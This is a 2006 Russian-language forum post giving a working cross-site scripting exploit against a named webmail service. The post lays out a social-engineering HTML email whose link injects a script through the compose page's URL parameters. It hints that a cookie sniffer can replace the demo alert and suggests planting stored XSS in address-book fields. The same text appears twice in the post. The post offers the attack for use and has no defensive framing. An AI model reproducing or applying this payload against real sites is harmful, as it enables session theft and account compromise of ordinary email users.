_kREveDKo_
29.04.2006, 23:48
Юзаем свои неисчерпаемые навыки соц. инженерии. Пишем в виде хтмл письмо с содержанием типа:
...бла-бла-бла... НАпиши мне! написать по-быстрому мона тут:
< a href='http://mail.telegraf.by/compose.pl?func=new&To=[_наше мыло_]"><script>alert("xaxa")</script><input type="text&Cc=[">XSS]&Bcc=[">XSS]&back=abook.pl&f=open'>ТУТ!</a>
откроется страничка в которой в поле для КОМУ будет наше мыло. А тем временем вылетит алерт =) (ха, а алерт ли нам нужен? ;))
Ещё заходим в адресную книгу и там заполняем поля фамилия, имя, мыло любимым скриптом для вставки сниффера
...бла-бла-бла... НАпиши мне! написать по-быстрому мона тут:
< a href='http://mail.telegraf.by/compose.pl?func=new&To=[_наше мыло_]"><script>alert("xaxa")</script><input type="text&Cc=[">XSS]&Bcc=[">XSS]&back=abook.pl&f=open'>ТУТ!</a>
откроется страничка в которой в поле для КОМУ будет наше мыло. А тем временем вылетит алерт =) (ха, а алерт ли нам нужен? ;))
Ещё заходим в адресную книгу и там заполняем поля фамилия, имя, мыло любимым скриптом для вставки сниффера